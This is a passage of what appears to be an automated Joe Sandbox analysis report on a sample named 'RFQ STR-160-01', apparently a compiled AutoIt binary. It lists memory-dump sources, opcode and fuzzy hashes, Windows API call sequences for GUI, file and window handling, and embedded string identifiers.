              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID: 0
              • API String ID: 0-4108050209
              • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
              • Instruction ID: 42391102777ea59033e9271cbaf080d359128587170e8e4032033e8fa4c5bdf1
              • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
              • Instruction Fuzzy Hash: B1515A7160C70E5BDB384968885E7FE6F99BBDE340F180949F882E7282C615FE41D356
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID: 0&f
              • API String ID: 0-3156573131
              • Opcode ID: cfd7c7a113f45e24bc2e490915e2ff2820d876a1dd60742958f41cc3b5362e84
              • Instruction ID: 714797d65f43ef3bed5c1654077ffe9f41d2040ec077073acadbfb5a0cf76953
              • Opcode Fuzzy Hash: cfd7c7a113f45e24bc2e490915e2ff2820d876a1dd60742958f41cc3b5362e84
              • Instruction Fuzzy Hash: D921A8326606128BD72CCE79C8276BA73E6AB54310F15862EE4A7C37D0DE75A904C740
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 680f1d3e7e1f3dd08d4c6a96f58e680318413b684295a77c7d6a4b239dd89ef4
              • Instruction ID: a3aed60bce83f644dbaf48150abfdbf780b12ab8c979b53f93434eb207030b8f
              • Opcode Fuzzy Hash: 680f1d3e7e1f3dd08d4c6a96f58e680318413b684295a77c7d6a4b239dd89ef4
              • Instruction Fuzzy Hash: D6322331D28F054DD7239634D822335AA89BFBB3C5F14E72BE81AB5DA6EB28C4834540
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1ad3fa34b40242ead8fad4e6360a6a9a8c5db124c2633d001d169838bbe77356
              • Instruction ID: 9bc48e26edb96427fcb6a1c3002b3b0c4f7b668b29187b075e7b67011d8db586
              • Opcode Fuzzy Hash: 1ad3fa34b40242ead8fad4e6360a6a9a8c5db124c2633d001d169838bbe77356
              • Instruction Fuzzy Hash: 4232F931A041958BDF2CCF2AC4A467D7FA2FB46314F28856AD4EA9B691D230DD83DB41
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ebfdddf5dc5174eb3ae379b0328da8e045e143d2392c281551fa98596cea3157
              • Instruction ID: 06184b61ad0643c7fe641293f95f5b7360e6ca1b6ab7fd5d4000a401d6fc5f02
              • Opcode Fuzzy Hash: ebfdddf5dc5174eb3ae379b0328da8e045e143d2392c281551fa98596cea3157
              • Instruction Fuzzy Hash: 3B229070A0460ADFDF14CFA8D845AAEBBF6FF48300F14452AE816A7391EB35AD55CB50
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 01689983b2fbfd56263de34666eee3248dae78233166a60631388b04b5361035
              • Instruction ID: d448299af248025ed72617b6c24c6db6509a60df227c923a498e27df093d5e8f
              • Opcode Fuzzy Hash: 01689983b2fbfd56263de34666eee3248dae78233166a60631388b04b5361035
              • Instruction Fuzzy Hash: C902B8B0A00206EBDF15EF58D885AADBFB5FF44300F50856AE4169B391EB31EE51CB91
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bee425c759e1dd10985b5bc306addfeb386125568c435ea35b044ea35e73df60
              • Instruction ID: 8197d2a4a70b90e2709efa14437f21afc291e4d4b12adebc525953ce14236d70
              • Opcode Fuzzy Hash: bee425c759e1dd10985b5bc306addfeb386125568c435ea35b044ea35e73df60
              • Instruction Fuzzy Hash: 2061397120870E66DE7499288D9ABFE2F98FFCD700F240D19E942DB2D1E911BE42CB55
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 371f86874deea86a604ffb4db69dc4bfa560db2cb0be1f44976c7b78357a364a
              • Instruction ID: 43a62b8c6b2e13ff295a9aae67080e2b5ea1adc8f999e9016613fef9f92edf42
              • Opcode Fuzzy Hash: 371f86874deea86a604ffb4db69dc4bfa560db2cb0be1f44976c7b78357a364a
              • Instruction Fuzzy Hash: A561597120870E5ADA385A3848A6BFE2F9CFFCE780F241959E943DF681D612FD41C255
              APIs
              • DeleteObject.GDI32(00000000), ref: 00612B30
              • DeleteObject.GDI32(00000000), ref: 00612B43
              • DestroyWindow.USER32 ref: 00612B52
              • GetDesktopWindow.USER32 ref: 00612B6D
              • GetWindowRect.USER32(00000000), ref: 00612B74
              • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00612CA3
              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00612CB1
              • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612CF8
              • GetClientRect.USER32(00000000,?), ref: 00612D04
              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00612D40
              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612D62
              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612D75
              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612D80
              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612D89
              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612D98
              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612DA1
              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612DA8
              • GlobalFree.KERNEL32(00000000), ref: 00612DB3
              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612DC5
              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0062FC38,00000000), ref: 00612DDB
              • GlobalFree.KERNEL32(00000000), ref: 00612DEB
              • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00612E11
              • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00612E30
              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00612E52
              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0061303F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
              • String ID: $AutoIt v3$DISPLAY$static
              • API String ID: 2211948467-2373415609
              • Opcode ID: 8d901bec62d91785549e2b483165a18760ae526cb328eeebd04c66268ed0a970
              • Instruction ID: 5c9d8329e41d9ef0b2f10d25180044c07a71c00d132b039c9ed75baf9540153c
              • Opcode Fuzzy Hash: 8d901bec62d91785549e2b483165a18760ae526cb328eeebd04c66268ed0a970
              • Instruction Fuzzy Hash: B7027C71900615EFDB24DF64CD89EAE7BBAFF49320F048158F915AB2A1DB70AD41CB60
              APIs
              • SetTextColor.GDI32(?,00000000), ref: 0062712F
              • GetSysColorBrush.USER32(0000000F), ref: 00627160
              • GetSysColor.USER32(0000000F), ref: 0062716C
              • SetBkColor.GDI32(?,000000FF), ref: 00627186
              • SelectObject.GDI32(?,?), ref: 00627195
              • InflateRect.USER32(?,000000FF,000000FF), ref: 006271C0
              • GetSysColor.USER32(00000010), ref: 006271C8
              • CreateSolidBrush.GDI32(00000000), ref: 006271CF
              • FrameRect.USER32(?,?,00000000), ref: 006271DE
              • DeleteObject.GDI32(00000000), ref: 006271E5
              • InflateRect.USER32(?,000000FE,000000FE), ref: 00627230
              • FillRect.USER32(?,?,?), ref: 00627262
              • GetWindowLongW.USER32(?,000000F0), ref: 00627284
                • Part of subcall function 006273E8: GetSysColor.USER32(00000012), ref: 00627421
                • Part of subcall function 006273E8: SetTextColor.GDI32(?,?), ref: 00627425
                • Part of subcall function 006273E8: GetSysColorBrush.USER32(0000000F), ref: 0062743B
                • Part of subcall function 006273E8: GetSysColor.USER32(0000000F), ref: 00627446
                • Part of subcall function 006273E8: GetSysColor.USER32(00000011), ref: 00627463
                • Part of subcall function 006273E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00627471
                • Part of subcall function 006273E8: SelectObject.GDI32(?,00000000), ref: 00627482
                • Part of subcall function 006273E8: SetBkColor.GDI32(?,00000000), ref: 0062748B
                • Part of subcall function 006273E8: SelectObject.GDI32(?,?), ref: 00627498
                • Part of subcall function 006273E8: InflateRect.USER32(?,000000FF,000000FF), ref: 006274B7
                • Part of subcall function 006273E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006274CE
                • Part of subcall function 006273E8: GetWindowLongW.USER32(00000000,000000F0), ref: 006274DB
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
              • String ID:
              • API String ID: 4124339563-0
              • Opcode ID: 1d4a4d33ece863dd9e552857c1511a1ea9d527c3ac4620b0a1bb2667fbd377e7
              • Instruction ID: 96bbeaa7704b07da6083ba90a2d713d0b04564de6f665de760c77d62ba981882
              • Opcode Fuzzy Hash: 1d4a4d33ece863dd9e552857c1511a1ea9d527c3ac4620b0a1bb2667fbd377e7
              • Instruction Fuzzy Hash: 99A1BF72008B11AFD7209F64DC48E5E7BAAFF49330F101A19F962A61E0D771E956CF52
              APIs
              • DestroyWindow.USER32(00000000), ref: 0061273E
              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0061286A
              • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 006128A9
              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 006128B9
              • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00612900
              • GetClientRect.USER32(00000000,?), ref: 0061290C
              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00612955
              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00612964
              • GetStockObject.GDI32(00000011), ref: 00612974
              • SelectObject.GDI32(00000000,00000000), ref: 00612978
              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00612988
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00612991
              • DeleteDC.GDI32(00000000), ref: 0061299A
              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006129C6
              • SendMessageW.USER32(00000030,00000000,00000001), ref: 006129DD
              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00612A1D
              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00612A31
              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00612A42
              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00612A77
              • GetStockObject.GDI32(00000011), ref: 00612A82
              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00612A8D
              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00612A97
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
              • API String ID: 2910397461-517079104
              • Opcode ID: a9b89cdb6176f2fcf67d94cbd59b0d9d925ba31d893bbdea3b0554006ea72fbb
              • Instruction ID: 900a16bc82137f15c4af8547cf096d939c7d2ae0427a59a9b7845e33138afa87
              • Opcode Fuzzy Hash: a9b89cdb6176f2fcf67d94cbd59b0d9d925ba31d893bbdea3b0554006ea72fbb
              • Instruction Fuzzy Hash: 83B16D71A00615AFEB24DF68DC4AEAE7BAAFB49710F044115F915EB2A0D770ED40CB94
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 00604AED
              • GetDriveTypeW.KERNEL32(?,0062CB68,?,\\.\,0062CC08), ref: 00604BCA
              • SetErrorMode.KERNEL32(00000000,0062CB68,?,\\.\,0062CC08), ref: 00604D36
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorMode$DriveType
              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
              • API String ID: 2907320926-4222207086
              • Opcode ID: 7b0819db2de6898c7b5a53401639ae4905a137af2a7b96e8005ec672ccd8fdec
              • Instruction ID: 4c35ffa207cb9fa44e1e68043d5dfb4903a04b755bf79fa2c693af108a380d8d
              • Opcode Fuzzy Hash: 7b0819db2de6898c7b5a53401639ae4905a137af2a7b96e8005ec672ccd8fdec
              • Instruction Fuzzy Hash: 0461D0B02C2106EBDB28DF14CA869AE7BB3AF44301F644515FA06AB2D1DF31DD46DB41
              APIs
              • GetSysColor.USER32(00000012), ref: 00627421
              • SetTextColor.GDI32(?,?), ref: 00627425
              • GetSysColorBrush.USER32(0000000F), ref: 0062743B
              • GetSysColor.USER32(0000000F), ref: 00627446
              • CreateSolidBrush.GDI32(?), ref: 0062744B
              • GetSysColor.USER32(00000011), ref: 00627463
              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00627471
              • SelectObject.GDI32(?,00000000), ref: 00627482
              • SetBkColor.GDI32(?,00000000), ref: 0062748B
              • SelectObject.GDI32(?,?), ref: 00627498
              • InflateRect.USER32(?,000000FF,000000FF), ref: 006274B7
              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006274CE
              • GetWindowLongW.USER32(00000000,000000F0), ref: 006274DB
              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0062752A
              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00627554
              • InflateRect.USER32(?,000000FD,000000FD), ref: 00627572
              • DrawFocusRect.USER32(?,?), ref: 0062757D
              • GetSysColor.USER32(00000011), ref: 0062758E
              • SetTextColor.GDI32(?,00000000), ref: 00627596
              • DrawTextW.USER32(?,006270F5,000000FF,?,00000000), ref: 006275A8
              • SelectObject.GDI32(?,?), ref: 006275BF
              • DeleteObject.GDI32(?), ref: 006275CA
              • SelectObject.GDI32(?,?), ref: 006275D0
              • DeleteObject.GDI32(?), ref: 006275D5
              • SetTextColor.GDI32(?,?), ref: 006275DB
              • SetBkColor.GDI32(?,?), ref: 006275E5
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
              • String ID:
              • API String ID: 1996641542-0
              • Opcode ID: 48b6eabd50bd74ae4e46234c4a63a405b5a4c82bb15a81a6cb47a90ca47d8a92
              • Instruction ID: 43610fd65f9191adc2d5c82e50f8dd933e519b8166eb4c92a5e39584270e6240
              • Opcode Fuzzy Hash: 48b6eabd50bd74ae4e46234c4a63a405b5a4c82bb15a81a6cb47a90ca47d8a92
              • Instruction Fuzzy Hash: B7617C72900A28AFDB109FA4DC49EEEBFBAEF09320F105111F911BB2A1D7709951DF90
              APIs
              • GetCursorPos.USER32(?), ref: 00621128
              • GetDesktopWindow.USER32 ref: 0062113D
              • GetWindowRect.USER32(00000000), ref: 00621144
              • GetWindowLongW.USER32(?,000000F0), ref: 00621199
              • DestroyWindow.USER32(?), ref: 006211B9
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006211ED
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0062120B
              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0062121D
              • SendMessageW.USER32(00000000,00000421,?,?), ref: 00621232
              • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00621245
              • IsWindowVisible.USER32(00000000), ref: 006212A1
              • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 006212BC
              • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 006212D0
              • GetWindowRect.USER32(00000000,?), ref: 006212E8
              • MonitorFromPoint.USER32(?,?,00000002), ref: 0062130E
              • GetMonitorInfoW.USER32(00000000,?), ref: 00621328
              • CopyRect.USER32(?,?), ref: 0062133F
              • SendMessageW.USER32(00000000,00000412,00000000), ref: 006213AA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
              • String ID: ($0$tooltips_class32
              • API String ID: 698492251-4156429822
              • Opcode ID: 69c5ed0f08bc7dd3f29d28d5cf4c1c0b70fd2a45f126bf2168762b11d903a7f0
              • Instruction ID: e1b00e2a59a4f4aa97fe443e3313554ddf3e255c9e36594d7f01d6cd2f179f5a
              • Opcode Fuzzy Hash: 69c5ed0f08bc7dd3f29d28d5cf4c1c0b70fd2a45f126bf2168762b11d903a7f0
              • Instruction Fuzzy Hash: 9DB19D71608751AFDB10DF24D888BAEBBE6FF99350F008918F9999B261CB31D845CF91
              APIs
              • CharUpperBuffW.USER32(?,?), ref: 006202E5
              • _wcslen.LIBCMT ref: 0062031F
              • _wcslen.LIBCMT ref: 00620389
              • _wcslen.LIBCMT ref: 006203F1
              • _wcslen.LIBCMT ref: 00620475
              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006204C5
              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00620504
                • Part of subcall function 005AF9F2: _wcslen.LIBCMT ref: 005AF9FD
                • Part of subcall function 005F223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005F2258
                • Part of subcall function 005F223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005F228A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _wcslen$MessageSend$BuffCharUpper
              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
              • API String ID: 1103490817-719923060
              • Opcode ID: 5986a6d0e4554e47bddbd7016eb8a436791aa0a497a715597635d97c693645bf
              • Instruction ID: 0a35e8f7f931d5d693897be1b0084c17993086def064ae989a319e10a63f2a1f
